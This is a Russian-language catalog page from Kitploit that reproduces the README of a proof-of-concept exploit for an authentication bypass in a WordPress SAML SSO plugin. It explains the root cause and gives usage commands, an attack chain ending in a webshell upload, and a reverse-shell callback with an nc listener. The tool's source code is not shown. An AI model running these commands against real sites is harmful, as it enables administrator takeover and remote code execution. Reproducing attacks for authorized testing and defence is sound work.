Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/zer0dayf/cve-2026-15013
Аутентификация и авторизацияПовышение привилегийГенерация полезной нагрузкиЭксплуатация веб-приложенийПост-эксплуатацияВеб-безопасностьТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubzer0dayf/cve-2026-15013

CVE-2026-15013

Эксплойт для CVE-2026-15013: неаутентифицированный обход аутентификации SAML через путаницу алгоритмов. Подделывает ответы SAML для получения доступа администратора и развёртывания webshell/обратной оболочки. Для авторизованного тестирования.

125 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2026-15013 — miniOrange SAML SSO <= 5.4.3: обход аутентификации (PoC)

PoC для CVE-2026-15013: неаутентифицированный обход аутентификации через путаницу алгоритмов подписи SAML (HMAC-SHA1) в WordPress-плагине miniOrange SAML Single Sign On – SSO Login (версии до 5.4.3 включительно).

Только авторизованное тестирование. Используйте этот код исключительно в системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Несанкционированный доступ к компьютерным системам противозаконен.

Благодарности

Роль
Обнаруживший уязвимостьlhking (указан в записи CVE)
CVE / CNAWordfence
Данный репозиторийНезависимое лабораторное воспроизведение / автоматизация PoC (не исходное обнаружение)

Запись CVE: https://www.cve.org/CVERecord?id=CVE-2026-15013

Первопричина

Mo_SAML_Utilities::mo_saml_cast_key() доверяет алгоритму SignatureMethod из управляемого атакующим SAMLResponse. Когда задан HMAC-SHA1, плагин переинтерпретирует открытый ключ RSA IdP как общий секрет HMAC и проверяет с его помощью подпись. Любой, кто может прочитать сертификат IdP (часто это публичные метаданные), может подделать действительное утверждение для любого существующего пользователя WordPress, включая администраторов.

Исправлено в 5.4.4+ (небезопасные алгоритмы / HMAC отклоняются).

CVSS

9.8 КРИТИЧЕСКИЙ — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Требования

  • Python 3.10+
  • openssl CLI (для преобразования сертификата в открытый ключ)
  • Сетевой доступ к целевому сайту WordPress и, для автоматического получения ключа, к SAML-дескриптору IdP

Установка зависимостей:

root@kitploit:~
pip install -r requirements.txt

Использование

Полная цепочка (энумерация, HMAC-вход, админ, веб-шелл):

root@kitploit:~
python3 exploit.py -u https://TARGET.example

Опциональный reverse shell (сначала запустите слушатель: nc -lvnp 4444):

root@kitploit:~
python3 exploit.py -u https://TARGET.example --lhost YOUR_IP --lport 4444

Только вход (без шелла):

root@kitploit:~
python3 exploit.py -u https://TARGET.example --no-shell

Ручное переопределение параметров:

root@kitploit:~
python3 exploit.py -u https://TARGET.example \
  --issuer https://idp.example/realms/xxx \
  --nameid admin \
  -k ./idp-pubkey.pem

Аргументы

Порядок работы

  1. Определить WordPress и версию плагина (должна быть <= 5.4.3)
  2. Обнаружить ACS, SP entityID, издателя IdP
  3. Получить подписывающий сертификат IdP (метаданные) и извлечь PEM открытого ключа (секрет HMAC)
  4. Перечислить пользователей WordPress
  5. Подделать подписанный HMAC-SHA1 SAMLResponse для каждого пользователя-кандидата
  6. Выбрать учётную запись с правом install_plugins (администратор)
  7. Загрузить плагин-вебшелл (exp/shell.php?c=id)
  8. Опциональный reverse shell через --lhost

Отказ от ответственности

Этот проект предназначен только для образовательных целей и авторизованных исследований в области безопасности. Авторы и участники не несут ответственности за неправомерное использование. Всегда получайте письменное разрешение перед тестированием сторонних систем. Исходная уязвимость была раскрыта в рамках ответственного раскрытия (responsible disclosure); данный репозиторий лишь демонстрирует воспроизведение для обучения и защитной проверки.

Ссылки

  • https://www.cve.org/CVERecord?id=CVE-2026-15013
  • https://www.wordfence.com/threat-intel/vulnerabilities/id/ee95092d-6351-4612-872d-284165bc1201?source=cve
  • Исправление плагина: miniOrange SAML 5.4.4+

Лицензия

Для исследовательского использования. Без гарантий.

Скачать инструмент
ФлагОписание
-u, --urlБазовый URL WordPress (обязательно)
-k, --hmac-keyPEM-файл открытого ключа или сертификата; если пусто — получить из метаданных IdP
--issuerПереопределить издателя (issuer) IdP
--acsПереопределить ACS URL
--nameidПринудительно задать одно имя пользователя WordPress
--lhost / --lportОбратный вызов reverse shell (порт по умолчанию 4444)
--no-shellОстановиться после сессии администратора
--no-reverseЗагрузить шелл, но не запускать reverse-подключение